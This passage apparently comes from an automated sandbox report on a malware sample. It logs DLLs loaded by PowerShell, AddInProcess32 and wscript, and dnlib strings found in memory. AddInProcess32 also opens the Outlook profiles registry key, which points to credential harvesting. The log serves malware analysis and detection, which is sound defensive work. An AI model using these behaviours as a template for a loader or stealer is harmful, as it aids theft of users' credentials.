                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
